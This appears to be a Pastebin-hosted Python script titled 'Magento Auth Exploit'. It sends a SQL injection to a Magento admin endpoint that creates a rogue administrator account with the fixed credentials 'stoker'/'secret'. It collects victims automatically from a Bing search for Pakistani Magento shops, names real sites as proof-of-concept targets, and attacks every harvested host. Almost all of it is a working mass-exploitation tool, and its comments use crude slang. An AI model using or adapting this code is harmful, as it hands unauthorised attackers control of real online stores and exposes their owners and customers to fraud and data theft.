document.write('
Data hosted with ♥ by Pastebin.com - Download Raw - See Original
  1. #!/usr/bin/python
  2. \'\'\'
  3. POC Sites:
  4. www.anandindia.in
  5. goyalglassware.com
  6. ishopping.pk
  7. value.pk
  8.  
  9.  
  10. References:
  11. http://blog.checkpoint.com/2015/04/20/analyzing-magento-vulnerability/
  12. \'\'\'
  13. try:
  14.     from urlparse import urlsplit
  15.     import requests, base64, sys, re, os
  16. except:
  17.     exit("\\n\\n[-] Import Error !\\n")
  18.  
  19. def Exploit(url):
  20.     final_url = "http://" + url + "/admin/Cms_Wysiwyg/directive/index/"
  21.     q = """
  22.         SET @SALT = \'rp\';
  23.         SET @PASS = CONCAT(MD5(CONCAT( @SALT , \'{password}\') ), CONCAT(\':\', @SALT ));
  24.         SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;
  25.         INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES (\'Firstname\',\'Lastname\',\'email@example.com\',\'{username}\',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());
  26.         INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,\'U\',(SELECT user_id FROM admin_user WHERE username = \'{username}\'),\'Firstname\');
  27.     """
  28.     query = q.replace("\\n", "").format(username="stoker", password="secret")
  29.     pfilter = "popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);{0}".format(query)
  30.     r = requests.post(final_url,
  31.                   data={"___directive": "e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ",
  32.                         "filter": base64.b64encode(pfilter),
  33.                         "forwarded": 1})
  34.     if r.ok:
  35.         print "\\n -- > [{0}/admin]  Credentials: [\'stoker\' : \'secret\']".format(url)
  36.     else:
  37.         print " [-] {0} Not Vulnerable".format(url)
  38.  
  39. def main():
  40.     # Change Dork in Bing URL if u need to modify it !
  41.     # Google Will also Work Same, infact more better if you use
  42.     # inurl:js/magentothem/
  43.     # dork, but it\'ll ask you to enter captcha after multiple requests from the same ip
  44.     # i\'m too lazy to play with that, so i gone ahead with bing.
  45.     # Bing\'s instreamUrl:Title:URL is not gonna work Here !
  46.     response = requests.get(\'http://www.bing.com/search?q=Powered+by+Magento+site%3Apk\')
  47.     URLs = re.findall(r\'href=[\\\'"]?([^\\\'" >]+)\', response.content) # Old Friend :P
  48.     URLS_LIST = [] # Container for Bitches !
  49.     for url in URLs:
  50.         baseUrl = urlsplit(url).netloc # meet your requirements ;)
  51.         if len(baseUrl) != 0: # Cheaters Not Allowed !
  52.             URLS_LIST.append(baseUrl) # Load Bitches
  53.     for uri in set(URLS_LIST):
  54.         Exploit(uri) # Bang Bang Bang
  55.  
  56. if __name__ == \'__main__\':
  57.     os.system(\'cls\')
  58.     try:
  59.         print \'\'\'\\n
  60. -------------------------------------------------
  61.     Title:  Magento Auth Exploit !
  62.  
  63.     Author: Muhammad Adeel
  64.     Mail:   Chaudhary1337@gmail.com
  65.     Blog:   http://urdusecurity.blogspot.com
  66. -------------------------------------------------\\n\\n
  67.         \'\'\'
  68.         main()
  69.     except:
  70.         exit("\\nErrrrrrrrrrrrrrrrroooooooooooooooooooooorrrrrrrrrrrrrrrrrrrrrrrrrrr !!!")
');